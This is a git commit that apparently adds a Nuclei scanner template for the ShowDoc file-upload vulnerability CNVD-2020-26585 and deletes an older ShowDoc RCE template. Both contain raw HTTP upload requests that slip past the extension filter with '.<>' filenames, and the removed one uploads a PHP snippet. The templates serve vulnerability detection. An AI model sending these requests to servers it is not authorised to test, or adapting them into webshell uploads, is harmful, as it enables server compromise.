Merge pull request #6956 from Co5mos/CNVD-2020-26585

ADD CNVD-2020-26585 Template
2023-04-06 11:28:28 +05:30 · 2023-04-06 11:28:28 +05:30 · c58d57d5ec
parent e99bdbe9d2 f3ca8fd92a
commit c58d57d5ec
2 changed files with 68 additions and 49 deletions
--- a/cnvd/2020/CNVD-2020-26585.yaml
+++ b/cnvd/2020/CNVD-2020-26585.yaml
@ -0,0 +1,68 @@
+id: CNVD-2020-26585
+
+info:
+  name: Showdoc <2.8.6 - File Uploads
+  author: pikpikcu,Co5mos
+  severity: critical
+  description: |
+    ShowDoc is an online API and technical documentation tool that is very suitable for IT teams. Showdoc has a file upload vulnerability, which attackers can exploit to gain server permissions.
+  reference:
+    - https://vul.wangan.com/a/CNVD-2020-26585
+    - https://blog.csdn.net/qq_48985780/article/details/122211136
+    - https://github.com/star7th/showdoc/pull/1059
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L
+    cvss-score: 9.9
+    cwe-id: CWE-434
+  metadata:
+    verified: true
+    fofa-query: app="ShowDoc"
+  tags: cnvd,cnvd2020,showdoc,fileupload
+
+requests:
+  - raw:
+      - |
+        POST /index.php?s=/home/page/uploadImg HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=--------------------------835846770881083140190633
+
+        ----------------------------835846770881083140190633
+        Content-Disposition: form-data; name="editormd-image-file"; filename="{{randstr}}.<>txt"
+        Content-Type: text/plain
+
+        test{{randstr}}
+        ----------------------------835846770881083140190633--
+
+      - |
+        GET /Public//Uploads//{{date}}//{{file}} HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "test{{randstr}}"
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        name: date
+        part: body
+        group: 1
+        regex:
+          - '(\d{4}-\d{2}-\d{2})\\/([a-f0-9]+\.txt)'
+        internal: true
+
+      - type: regex
+        name: file
+        part: body
+        group: 2
+        regex:
+          - '(\d{4}-\d{2}-\d{2})\\/([a-f0-9]+\.txt)'
+        internal: true
+
+# Enhanced by mp on 2022/05/30
--- a/vulnerabilities/other/showdoc-file-upload-rce.yaml
+++ b/vulnerabilities/other/showdoc-file-upload-rce.yaml
@ -1,49 +0,0 @@
-id: showdoc-file-upload-rce
-
-info:
-  name: Showdoc <2.8.6 - Remote Code Execution
-  author: pikpikcu
-  severity: critical
-  description: |
-    Showdoc versions before 2.8.6 is susceptible to remote code execution.
-  reference:
-    - https://github.com/star7th/showdoc/pull/1059
-  classification:
-    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
-    cvss-score: 10.0
-    cwe-id: CWE-77
-  tags: rce,fileupload,showdoc,oss,intrusive
-
-requests:
-  - raw:
-      - |
-        POST /index.php?s=/home/page/uploadImg HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: multipart/form-data; boundary=--------------------------835846770881083140190633
-
-        ----------------------------835846770881083140190633
-        Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php"
-        Content-Type: text/plain
-
-        <?php echo md5('rce_test');?>
-        ----------------------------835846770881083140190633--
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - '"url":"http:'
-          - '"success":1'
-        condition: and
-
-      - type: status
-        status:
-          - 200
-
-    extractors:
-      - type: json
-        json:
-          - '.url'
-
-# Enhanced by mp on 2022/05/30